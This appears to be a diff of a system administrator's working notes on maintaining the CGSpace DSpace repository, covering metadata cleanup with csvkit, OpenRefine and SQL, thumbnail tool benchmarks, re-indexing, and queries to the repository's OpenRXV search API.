                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -Found 2707 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -Total number of hits from bots: 4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +Found 2707 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +Total number of hits from bots: 4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I found some CGSpace metadata in the wrong fields
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Seven metadata in dc.subject (57) should be in dcterms.subject (187)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • @@ -289,8 +289,8 @@ Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I exported the entire CGSpace repository as a CSV to do some work on ISSNs and ISBNs:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c 'id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]' /tmp/2021-08-08-cgspace.csv > /tmp/2021-08-08-issn-isbn.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,cg.issn,cg.issn[],cg.issn[en],cg.issn[en_US],cg.isbn,cg.isbn[],cg.isbn[en_US]' /tmp/2021-08-08-cgspace.csv > /tmp/2021-08-08-issn-isbn.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then in OpenRefine I merged all null, blank, and en fields into the en_US one for each, removed all spaces, fixed invalid multi-value separators, removed everything other than ISSN/ISBNs themselves
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • In total it was a few thousand metadata entries or so so I had to split the CSV with xsv split in order to process it
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -303,20 +303,20 @@ Found 1785 hits from nettle in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Extract all unique ISSNs to look up on Sherpa Romeo and Crossref
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c 'cg.issn[en_US]' ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c 1 -r '^[0-9]{4}' | sed 1d | sort | uniq > /tmp/2021-08-09-issns.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c 'cg.issn[en_US]' ~/Downloads/2021-08-08-CGSpace-ISBN-ISSN.csv | csvgrep -c 1 -r '^[0-9]{4}' | sed 1d | sort | uniq > /tmp/2021-08-09-issns.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./ilri/sherpa-issn-lookup.py -a mehhhhhhhhhhhhh -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./ilri/crossref-issn-lookup.py -e me@cgiar.org -i /tmp/2021-08-09-issns.txt -o /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then I updated the CSV headers for each and joined the CSVs on the issn column:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ sed -i '1s/journal title/sherpa romeo journal title/' /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ sed -i '1s/journal title/crossref journal title/' /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv > /tmp/2021-08-09-journals-all.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ sed -i '1s/journal title/sherpa romeo journal title/' /tmp/2021-08-09-journals-sherpa-romeo.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ sed -i '1s/journal title/crossref journal title/' /tmp/2021-08-09-journals-crossref.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-journals-crossref.csv > /tmp/2021-08-09-journals-all.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • In OpenRefine I faceted by blank in each column and copied the values from the other, then created a new column to indicate whether the values were the same with this GREL:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].value,"same","different")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  if(cells['sherpa romeo journal title'].value == cells['crossref journal title'].value,"same","different")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I exported the list of journals that differ and sent it to Peter for comments and corrections
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I want to build an updated controlled vocabulary so I can update CGSpace and reconcile our existing metadata against it
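The join and comparison above could also be scripted outside OpenRefine. This is a minimal sketch, assuming the two CSVs already carry the renamed `sherpa romeo journal title` and `crossref journal title` headers and share an `issn` column; the function name `join_and_compare` and the sample ISSNs and titles are made up for illustration and are not from the real data.

```python
import csv
import io

SHERPA = "sherpa romeo journal title"
CROSSREF = "crossref journal title"

# Made-up sample data, only to illustrate the shape of the two files.
SAMPLE_SHERPA = (
    "issn,sherpa romeo journal title\n"
    "0000-0001,Example Journal A\n"
    "0000-0002,\n"
    "0000-0003,Example Journal C\n"
)
SAMPLE_CROSSREF = (
    "issn,crossref journal title\n"
    "0000-0001,Example Journal A\n"
    "0000-0002,Example Journal B\n"
    "0000-0003,Example journal C\n"
    "0000-0004,Example Journal D\n"
)


def join_and_compare(sherpa_csv, crossref_csv):
    """Inner-join two CSV texts on issn and label whether the titles agree."""
    sherpa = {r["issn"]: r[SHERPA] for r in csv.DictReader(io.StringIO(sherpa_csv))}
    crossref = {r["issn"]: r[CROSSREF] for r in csv.DictReader(io.StringIO(crossref_csv))}

    rows = []
    # Keep only ISSNs present in both files (an inner join).
    for issn in sorted(sherpa.keys() & crossref.keys()):
        # Fill a blank title from the other source, as done by hand in OpenRefine.
        s_title = sherpa[issn] or crossref[issn]
        c_title = crossref[issn] or sherpa[issn]
        status = "same" if s_title == c_title else "different"
        rows.append({"issn": issn, SHERPA: s_title, CROSSREF: c_title, "status": status})
    return rows


for row in join_and_compare(SAMPLE_SHERPA, SAMPLE_CROSSREF):
    print(row["issn"], row["status"])
```

The comparison is an exact string match, like the GREL expression, so titles that differ only in case or whitespace are reported as "different".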
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -332,15 +332,15 @@ $ csvjoin -c issn /tmp/2021-08-09-journals-sherpa-romeo.csv /tmp/2021-08-09-jour
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I did some tests of the memory used and time elapsed with libvips, GraphicsMagick, and ImageMagick:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s 600 -o '%s-vips.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -39004:0.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ /usr/bin/time -f %M:%e gm convert IPCC.pdf\[0\] -quality 85 -thumbnail x600 -flatten IPCC-gm.jpg 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -40932:0.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ /usr/bin/time -f %M:%e convert IPCC.pdf\[0\] -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -41724:0.59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality 85 -thumbnail 600x600 IPCC-im.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -24736:0.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ /usr/bin/time -f %M:%e vipsthumbnail IPCC.pdf -s 600 -o '%s-vips.jpg[Q=85,optimize_coding,strip]'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +39004:0.08
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ /usr/bin/time -f %M:%e gm convert IPCC.pdf\[0\] -quality 85 -thumbnail x600 -flatten IPCC-gm.jpg 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +40932:0.53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ /usr/bin/time -f %M:%e convert IPCC.pdf\[0\] -flatten -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_cmyk.icc -profile /usr/share/ghostscript/9.54.0/iccprofiles/default_rgb.icc /tmp/impdfthumb2862933674765647409.pdf.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +41724:0.59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409.pdf.jpg -quality 85 -thumbnail 600x600 IPCC-im.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +24736:0.04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • The ImageMagick way is the same as how DSpace does it (first creating an intermediary image, then getting a thumbnail)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • libvips does use less time and memory… I should do more tests!
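To compare the three tools on equal terms, the `%M:%e` pairs printed by `/usr/bin/time` (maximum resident set size in KB, then elapsed seconds) can be combined per tool. This is a rough sketch using only the single-run numbers above; the helper names are hypothetical, and it assumes the two ImageMagick steps run one after the other, so peak memory is the larger of the two and elapsed time is their sum.

```python
def parse_time_output(line):
    """Parse one '%M:%e' line into (max RSS in KB, elapsed seconds)."""
    max_rss_kb, elapsed = line.strip().split(":")
    return int(max_rss_kb), float(elapsed)


def summarize(steps):
    """Combine sequential steps: peak memory is the max, elapsed time is the sum."""
    parsed = [parse_time_output(step) for step in steps]
    peak_kb = max(kb for kb, _ in parsed)
    total_s = round(sum(seconds for _, seconds in parsed), 2)
    return peak_kb, total_s


# Measurements copied from the single runs above.
RUNS = {
    "libvips": ["39004:0.08"],
    "GraphicsMagick": ["40932:0.53"],
    "ImageMagick": ["41724:0.59", "24736:0.04"],
}

SUMMARY = {tool: summarize(steps) for tool, steps in RUNS.items()}

for tool, (peak_kb, total_s) in SUMMARY.items():
    print(f"{tool}: peak {peak_kb} KB, {total_s} s")
```

These are single measurements on one PDF, so the differences (especially in memory) are only indicative until the tests are repeated.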
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -359,17 +359,17 @@ $ /usr/bin/time -f %M:%e convert -auto-orient /tmp/impdfthumb2862933674765647409
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -1911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ csvcut -c cgspace ~/Downloads/2021-08-09-CGSpace-Journals-PB.csv | sort -u | sed 1d > /tmp/journals1.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvcut -c 'sherpa romeo journal title' ~/Downloads/2021-08-09-CGSpace-Journals-All.csv | sort -u | sed 1d > /tmp/journals2.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ cat /tmp/journals1.txt /tmp/journals2.txt | sort -u | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +1911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
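The same merge-and-count can be sketched in Python. This is only an illustration: the helper names `unique_titles` and `combined_titles` and the sample data are hypothetical, and only the column names come from the commands above. One difference worth noting is that in the shell pipeline `sed 1d` runs after `sort -u`, so it removes whichever line sorts first, which is not necessarily the header; the sketch drops the header by parsing it as CSV instead.

```python
import csv
import io


def unique_titles(csv_text: str, column: str) -> set[str]:
    """Return the distinct, non-empty values of one CSV column (header excluded)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    titles = set()
    for row in reader:
        value = (row.get(column) or "").strip()
        if value:
            titles.add(value)
    return titles


def combined_titles(*title_sets: set[str]) -> list[str]:
    """Union several title sets and return them sorted, like `cat ... | sort -u`."""
    return sorted(set().union(*title_sets))


if __name__ == "__main__":
    # Hypothetical sample data standing in for the two downloaded CSV files
    pb = "cgspace\nAgricultural Systems\nFood Policy\nFood Policy\n"
    everything = "sherpa romeo journal title\nFood Policy\nWorld Development\n"

    merged = combined_titles(
        unique_titles(pb, "cgspace"),
        unique_titles(everything, "sherpa romeo journal title"),
    )
    print(len(merged))
```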
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Now I will create a controlled vocabulary out of this list and reconcile our existing journal title metadata with it in OpenRefine
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I exported a list of all the journal titles we have in the cg.journal field:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -COPY 3245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          localhost/dspace63= > \COPY (SELECT DISTINCT(text_value) AS "cg.journal" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +COPY 3245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don’t match, so I’d have to go check many of them manually before selecting a match or fixing them…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • I think it’s better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • @@ -421,10 +421,10 @@ COPY 3245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ dspace community-filiator --set --parent=10568/114644 --child=10568/72600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ dspace community-filiator --set --parent=10568/114644 --child=10568/35730
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ dspace community-filiator --set --parent=10568/114644 --child=10568/76451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
• I made a minor fix to OpenRXV to prefix all image names with docker.io so it works with fewer changes on podman
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Docker assumes the docker.io registry by default, but we should be explicit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -446,40 +446,40 @@ $ dspace community-filiator --set --parent=10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Lower case all AGROVOC metadata, as I had noticed a few in sentence case:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -UPDATE 484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +UPDATE 484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
• Also update some DOIs that still use the dx.doi.org format to doi.org, just to keep things uniform:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -UPDATE 469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +UPDATE 469
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
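For checking values outside the database, the same rewrite can be sketched in Python. The function name `normalize_doi_url` is hypothetical. Unlike the pattern passed to `regexp_replace` above, where each unescaped `.` matches any character (harmless there because of the `LIKE` guard), this sketch escapes the dots and anchors the match at the start of the value.

```python
import re

# Matches only values that begin with the old resolver prefix
DX_DOI_PREFIX = re.compile(r"^https://dx\.doi\.org")


def normalize_doi_url(value: str) -> str:
    """Rewrite a leading https://dx.doi.org to https://doi.org; leave other values untouched."""
    return DX_DOI_PREFIX.sub("https://doi.org", value)


if __name__ == "__main__":
    print(normalize_doi_url("https://dx.doi.org/10.1000/example"))
```

Values that already use `https://doi.org` pass through unchanged, so the function is safe to apply to a whole column.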
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -real    322m16.917s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -user    226m43.121s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -sys     3m17.469s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +real    322m16.917s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +user    226m43.121s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +sys     3m17.469s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    -H 'Content-Type: application/json' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    -d '{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    "size": 10,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    "query": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -        "bool": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -            "filter": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -                "term": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -                    "repo.keyword": "CGSpace"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -                }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -            }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -    }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search?scroll=1d' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    -H 'Content-Type: application/json' \
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    -d '{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    "size": 10,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    "query": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +        "bool": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +            "filter": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +                "term": {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +                    "repo.keyword": "CGSpace"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +                }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +            }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +    }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +}'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ curl -X POST 'https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ=='
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • This uses the Elasticsearch scroll ID to page through results
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • The second query doesn’t need the request body because it is saved for 1 day as part of the first request
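The two requests above can be combined into a loop that pages through all results. The following is a rough sketch under stated assumptions: the names `post_json` and `scroll_all` are hypothetical, and the response is assumed to follow the usual Elasticsearch shape (a `_scroll_id` field plus a `hits.hits` list), which these notes do not confirm for OpenRXV. Only the two URLs and the request body come from the commands above.

```python
import json
from urllib import request

# Base URL taken from the curl commands above.
BASE = "https://cgspace.cgiar.org/explorer/api/search"


def post_json(url, body=None):
    """POST an optional JSON body and return the decoded JSON response."""
    data = json.dumps(body).encode() if body is not None else None
    req = request.Request(
        url,
        data=data,
        method="POST",
        headers={"Content-Type": "application/json"},
    )
    with request.urlopen(req) as resp:
        return json.load(resp)


def scroll_all(query, post=post_json, base=BASE, keep_alive="1d"):
    """Yield every hit, following the scroll ID until a page comes back empty.

    Assumption: responses look like Elasticsearch's, i.e.
    {"_scroll_id": "...", "hits": {"hits": [...]}}.
    """
    # First request carries the query body and opens the scroll context.
    page = post(f"{base}?scroll={keep_alive}", query)
    while True:
        hits = page.get("hits", {}).get("hits", [])
        if not hits:
            break
        yield from hits
        scroll_id = page.get("_scroll_id")
        if not scroll_id:
            break
        # Follow-up requests send only the scroll ID, with no request body.
        page = post(f"{base}/scroll/{scroll_id}")


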